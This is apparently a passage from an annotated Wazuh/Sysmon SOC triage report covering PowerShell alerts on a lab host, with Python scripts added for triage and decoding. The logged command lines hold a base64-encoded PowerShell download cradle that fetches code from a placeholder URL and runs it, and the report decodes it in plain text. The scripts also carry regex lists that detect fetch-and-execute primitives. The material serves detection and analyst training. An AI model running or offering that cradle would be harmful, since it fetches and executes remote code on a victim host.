data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:41.7268408Z
Time the record was written to the Windows event log (UTC). Sits between Sysmon's UtcTime and the Wazuh timestamp.

data.win.system.eventRecordID:  350944
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the record, not the process under investigation; see data.win.eventdata.processId for that.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in; this is where to pull surrounding records with wevtutil or Event Viewer.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch means a renamed host or a misregistered agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:41.676 ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} ProcessId: 12292 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kteidnpa.tvp.ps1 CreationUtcTime: 2025-04-24 22:56:41.676 User: Attacker\Attcker1"
Full Sysmon File Create (EID 11) text before Wazuh split it into the eventdata fields below. Check it when a parsed field looks truncated.

data.win.eventdata.utcTime:  2025-04-24 22:56:41.676
Sysmon's own UTC time of the event. Earlier than the Wazuh timestamp above (which is receipt at the manager); use this one for the host timeline.

data.win.eventdata.processGuid:  {94294ddc-c1a7-680a-040d-000000000e00}
Sysmon's unique ID of the process that wrote the file. It is the same GUID as the powershell.exe in the EID 1 alerts on this page, so the file drop and the encoded command belong to one process.

data.win.eventdata.processId:  12292
Windows PID of the writing process. Reused once the process exits, so pivot on ProcessGuid rather than on this.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file. Note which process wrote it, not just what was written.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kteidnpa.tvp.ps1
Path of the file created. __PSScriptPolicyTest_*.ps1 in %TEMP% is the probe powershell.exe writes at start-up to test AppLocker/WDAC script enforcement; benign on its own, but it proves the process ran.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:41.676
Creation timestamp on the file. Normally equals UtcTime; if it is older, the file already existed or its timestamp was altered (see Sysmon EID 2).

data.win.eventdata.user:  Attacker\\Attcker1
Domain\user the writing process runs as.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
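Rule 92213 keys on any file dropped in a folder malware favours, but the file it caught here, __PSScriptPolicyTest_kteidnpa.tvp.ps1 in the user's Temp folder, is the probe script powershell.exe writes at start-up to check whether AppLocker/WDAC script enforcement applies. On its own that file is expected noise; what matters is that its ProcessGuid is the powershell.exe instance (PID 12292) carrying the encoded command in the EID 1 alerts on this page. The triage below is an added example, not SOCscribe or Wazuh code: it parses the flattened Sysmon message Wazuh shows in data.win.system.message, recognises the policy probe only when PowerShell itself wrote it, and returns the ProcessGuid to pivot on. The first sample is the alert's own message; the two extra messages (an .exe written to Temp, and the probe's file name written by a non-PowerShell binary) are constructed for contrast.

```python
import re

# Constructed sample: the Sysmon EID 11 message from the alert above (outer quotes dropped).
POLICY_PROBE_MSG = (
    r"File created: RuleName: - UtcTime: 2025-04-24 22:56:41.676 "
    r"ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} ProcessId: 12292 "
    r"Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kteidnpa.tvp.ps1 "
    r"CreationUtcTime: 2025-04-24 22:56:41.676 User: Attacker\Attcker1"
)
# Hypothetical variants for contrast (not from the page): a binary written to %TEMP% by the
# same process, and the probe's file name written by something that is not PowerShell.
EXE_DROP_MSG = (
    r"File created: RuleName: - UtcTime: 2025-04-24 22:57:00.000 "
    r"ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} ProcessId: 12292 "
    r"Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\svchost.exe "
    r"CreationUtcTime: 2025-04-24 22:57:00.000 User: Attacker\Attcker1"
)
FAKE_PROBE_MSG = (
    r"File created: RuleName: - UtcTime: 2025-04-24 22:58:00.000 "
    r"ProcessGuid: {94294ddc-ffff-680a-0a0d-000000000e00} ProcessId: 4242 "
    r"Image: C:\Users\Attcker1\AppData\Roaming\loader.exe "
    r"TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_abcdefgh.ijk.ps1 "
    r"CreationUtcTime: 2025-04-24 22:58:00.000 User: Attacker\Attcker1"
)

# "Key: value" pairs; a value runs until the next " Key: " token or the end of the string.
FIELD_RE = re.compile(r"(\w+): (.*?)(?= \w+: |$)")
# PowerShell's start-up probe: __PSScriptPolicyTest_<random>.<random>.ps1
PROBE_NAME_RE = re.compile(r"\\__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$", re.IGNORECASE)
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe", "\\powershell_ise.exe")
RISKY_EXTENSIONS = (".exe", ".dll", ".ps1", ".vbs", ".js", ".bat", ".cmd", ".scr", ".hta")


def parse_sysmon_message(message):
    """Split the flattened 'Event type: Key: value Key: value ...' text into a dict."""
    event_type, _, rest = message.partition(": ")
    fields = dict(FIELD_RE.findall(rest))
    fields["EventType"] = event_type
    return fields


def classify_file_create(fields):
    """Verdict for one EID 11 record.

    The policy probe is expected noise only when powershell.exe itself wrote it;
    the same file name from any other writer deserves a look, not a dismissal.
    """
    target = fields.get("TargetFilename", "")
    image = fields.get("Image", "").lower()
    if PROBE_NAME_RE.search(target):
        if image.endswith(POWERSHELL_IMAGES):
            return "powershell_policy_probe"
        return "probe_name_from_unexpected_process"
    if "\\temp\\" in target.lower() and target.lower().endswith(RISKY_EXTENSIONS):
        return "executable_or_script_in_temp"
    return "unclassified"


def triage_file_create(message):
    fields = parse_sysmon_message(message)
    return {
        "verdict": classify_file_create(fields),
        "target": fields.get("TargetFilename"),
        "writer": fields.get("Image"),
        # Join key to the EID 1 record of the same process (PIDs get reused, GUIDs do not).
        "pivot_process_guid": fields.get("ProcessGuid"),
    }


if __name__ == "__main__":
    for msg in (POLICY_PROBE_MSG, EXE_DROP_MSG, FAKE_PROBE_MSG):
        print(triage_file_create(msg))
```

The verdict on its own never closes the alert: the probe file says only that a new powershell.exe started, and the pivot_process_guid is what leads to the EID 1 record that decides whether that start was hostile.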

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:47.956+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:47.956+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  134
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535407.2901696
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event; Microsoft-Windows-Sysmon here, so the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that ETW provider; constant for Sysmon, useful only for filtering.

data.win.system.eventID:  1
Event ID within this provider. For Sysmon, 1 = Process Create and 11 = File Create; these are not the Security log's 4624/4688 numbering.

data.win.system.version:  5
Schema version of this Sysmon event ID. It changes when a Sysmon release adds fields, so parsers should key on it.

data.win.system.level:  4
Numeric event level (4 = Informational). Sysmon logs everything at this level, so it says nothing about severity.

data.win.system.task:  1
Task category of the record. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:45.6413370Z
Time the record was written to the Windows event log (UTC). Sits between Sysmon's UtcTime and the Wazuh timestamp.

data.win.system.eventRecordID:  350971
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the record, not the process under investigation; see data.win.eventdata.processId for that.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in; this is where to pull surrounding records with wevtutil or Event Viewer.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch means a renamed host or a misregistered agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:42.931 ProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00} ProcessId: 10312 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} ParentProcessId: 12292 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full Sysmon Process Create (EID 1) text before Wazuh split it into the eventdata fields below. Check it when a parsed field looks truncated; the encoded command is easiest to copy from here.

data.win.eventdata.utcTime:  2025-04-24 22:56:42.931
Sysmon's own UTC time of the event. Earlier than the Wazuh timestamp above (which is receipt at the manager); use this one for the host timeline.

data.win.eventdata.processGuid:  {94294ddc-c1aa-680a-060d-000000000e00}
Sysmon's unique ID for this process. Never reused, unlike the PID, so it is the join key to the other Sysmon events (EID 11, 3, 7 ...) this process generated.

data.win.eventdata.processId:  10312
Windows PID. Reused once the process exits, so pivot on ProcessGuid rather than on this.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started. Confirm it is the real System32 location; look-alike paths are a masquerading sign.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the PE resource. Compare with the OS build; a mismatch suggests a copied or old binary.

data.win.eventdata.description:  Windows PowerShell
Description field from the PE version resource. Attacker-controlled for unsigned binaries, so confirm with the hash.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product field from the PE version resource; same caveat as Description.

data.win.eventdata.company:  Microsoft Corporation
Company field from the PE version resource; same caveat as Description.

data.win.eventdata.originalFileName:  PowerShell.EXE
Name compiled into the PE. Stays PowerShell.EXE even if the file on disk was renamed, which is the quick masquerading check.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line. -EncodedCommand takes base64 of UTF-16LE script text; decode it before judging the alert, the encoding itself proves nothing.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the process. Shows where the user or script was operating; the profile root here is consistent with an interactive session.

data.win.eventdata.user:  Attacker\\Attcker1
Domain\user the process runs as. Tie it to the LogonId below to find the logon event.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's ID for the logon session; every process in the same session shares it.

data.win.eventdata.logonId:  0x26584
Windows logon ID of the session. Match it to a Security event 4624 to see how, when and from where this user logged on.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is services, 1 and up are interactive or RDP sessions.

data.win.eventdata.integrityLevel:  Medium
Process integrity level (Low/Medium/High/System). Medium is a normal unelevated user; High means the process ran elevated.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file as configured in Sysmon. A known-good powershell.exe hash only says the binary is genuine, not that the command is.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1a7-680a-040d-000000000e00}
Sysmon GUID of the parent process; use it to walk the tree upward to the original launcher.

data.win.eventdata.parentProcessId:  12292
PID of the parent at creation time. Here it is 12292, the powershell.exe from the previous EID 1 alert, so the chain is one process spawning the next.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. powershell.exe spawning powershell.exe with an encoded command is exactly what rule 92057 keys on.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Command line of the parent. Identical to the child's here, so the encoded command is re-launching itself rather than being typed once.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent process runs as. A change from ParentUser to User would mean a token switch.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
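Rule 92057 is the alert to act on. Both parent and child are powershell.exe and both carry the identical -EncodedCommand payload, which decodes (base64 of UTF-16LE text) to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download cradle that fetches remote content and runs it in one expression. The PIDs chain 3616 → 12292 → 10312 → 11220 across the alerts on this page, so whatever comes back from that URL appears to re-launch the same command; rule.firedtimes climbing 134, 135 is the same loop. The script below is an added example, not SOCscribe's or Wazuh's own code: it takes the Wazuh-decoded eventdata fields, extracts the payload (powershell.exe accepts any unambiguous prefix of the parameter name, so -e, -ec and -enc are handled too), decodes it, and flags fetch-and-execute patterns, PowerShell spawning PowerShell, and the parent/child command-line match. The sample event is built from the alert's own fields; the abbreviated and malformed command lines used for the negative checks are constructed.

```python
import base64
import binascii
import re

# The -EncodedCommand payload exactly as it appears in the alert above.
ENCODED = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)
CMDLINE = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand " + ENCODED
)
# Constructed sample: the eventdata fields of the EID 1 alert above.
SAMPLE_EID1 = {
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "commandLine": CMDLINE,
    "parentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "parentCommandLine": CMDLINE,  # identical to the child's in the alert
    "user": r"Attacker\Attcker1",
}

POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
# Primitives that pull content from the network ...
FETCH_RE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|Invoke-WebRequest|\biwr\b"
    r"|Invoke-RestMethod|\birm\b|Start-BitsTransfer",
    re.IGNORECASE,
)
# ... and primitives that execute text as code. Both together make a cradle.
EXEC_RE = re.compile(
    r"\bIEX\b|Invoke-Expression|Invoke-Command|\[ScriptBlock\]::Create", re.IGNORECASE
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def find_encoded_command(command_line):
    """Return the base64 argument of -EncodedCommand, or None.

    powershell.exe resolves any unambiguous prefix of the parameter name
    (-e, -ec, -enc, -encoded ...), so match by prefix, not by the full word.
    """
    for m in re.finditer(r'-(\w+)\s+"?([A-Za-z0-9+/=]{8,})', command_line):
        flag, payload = m.group(1).lower(), m.group(2)
        if "encodedcommand".startswith(flag):
            return payload
    return None


def decode_encoded_command(payload):
    """-EncodedCommand carries the script as base64 over UTF-16LE text."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def is_powershell(image):
    return image.lower().endswith(POWERSHELL_IMAGES)


def triage_process_create(event):
    """Triage one Sysmon EID 1 eventdata dict the way rule 92057 asks an analyst to."""
    payload = find_encoded_command(event["commandLine"])
    decoded = decode_encoded_command(payload) if payload else None
    script = decoded if decoded is not None else event["commandLine"]
    return {
        "encoded": payload is not None,
        "decoded_command": decoded,
        "powershell_spawned_powershell": is_powershell(event["image"]) and is_powershell(event["parentImage"]),
        "download_cradle": bool(FETCH_RE.search(script)) and bool(EXEC_RE.search(script)),
        "urls": URL_RE.findall(script),
        # Same command line in parent and child: the fetched content re-launches the cradle.
        "self_respawn": event.get("parentCommandLine") == event["commandLine"],
    }


if __name__ == "__main__":
    for key, value in triage_process_create(SAMPLE_EID1).items():
        print(f"{key}: {value}")
```

The URL is the pivot for the next step: block it at the proxy, pull the content it serves (from a sandbox, not the victim), and search the other endpoints for the same encoded payload, because the chain on this page shows each new powershell.exe re-running it.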

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:47.967+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:47.967+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  138
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535407.2909767
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event; Microsoft-Windows-Sysmon here, so the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that ETW provider; constant for Sysmon, useful only for filtering.

data.win.system.eventID:  11
Event ID within this provider. For Sysmon, 1 = Process Create and 11 = File Create; these are not the Security log's 4624/4688 numbering.

data.win.system.version:  2
Schema version of this Sysmon event ID. It changes when a Sysmon release adds fields, so parsers should key on it.

data.win.system.level:  4
Numeric event level (4 = Informational). Sysmon logs everything at this level, so it says nothing about severity.

data.win.system.task:  11
Task category of the record. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:45.8540677Z
Time the record was written to the Windows event log (UTC). Sits between Sysmon's UtcTime and the Wazuh timestamp.

data.win.system.eventRecordID:  350972
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the record, not the process under investigation; see data.win.eventdata.processId for that.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in; this is where to pull surrounding records with wevtutil or Event Viewer.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch means a renamed host or a misregistered agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:45.841 ProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00} ProcessId: 10312 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zaf4aluj.1ni.ps1 CreationUtcTime: 2025-04-24 22:56:45.841 User: Attacker\Attcker1"
Full Sysmon File Create (EID 11) text before Wazuh split it into the eventdata fields below. Check it when a parsed field looks truncated.

data.win.eventdata.utcTime:  2025-04-24 22:56:45.841
Sysmon's own UTC time of the event. Earlier than the Wazuh timestamp above (which is receipt at the manager); use this one for the host timeline.

data.win.eventdata.processGuid:  {94294ddc-c1aa-680a-060d-000000000e00}
Sysmon's unique ID of the process that wrote the file. It is the GUID of PID 10312, the child powershell.exe from the previous EID 1 alert, so this is the same re-launch chain.

data.win.eventdata.processId:  10312
Windows PID of the writing process. Reused once the process exits, so pivot on ProcessGuid rather than on this.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file. Note which process wrote it, not just what was written.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zaf4aluj.1ni.ps1
Path of the file created. __PSScriptPolicyTest_*.ps1 in %TEMP% is the probe powershell.exe writes at start-up to test AppLocker/WDAC script enforcement; benign on its own, but it proves the process ran.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:45.841
Creation timestamp on the file. Normally equals UtcTime; if it is older, the file already existed or its timestamp was altered (see Sysmon EID 2).

data.win.eventdata.user:  Attacker\\Attcker1
Domain\user the writing process runs as.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:50.628+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:50.628+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  135
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535410.2912536
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event; Microsoft-Windows-Sysmon here, so the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that ETW provider; constant for Sysmon, useful only for filtering.

data.win.system.eventID:  1
Event ID within this provider. For Sysmon, 1 = Process Create and 11 = File Create; these are not the Security log's 4624/4688 numbering.

data.win.system.version:  5
Schema version of this Sysmon event ID. It changes when a Sysmon release adds fields, so parsers should key on it.

data.win.system.level:  4
Numeric event level (4 = Informational). Sysmon logs everything at this level, so it says nothing about severity.

data.win.system.task:  1
Task category of the record. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
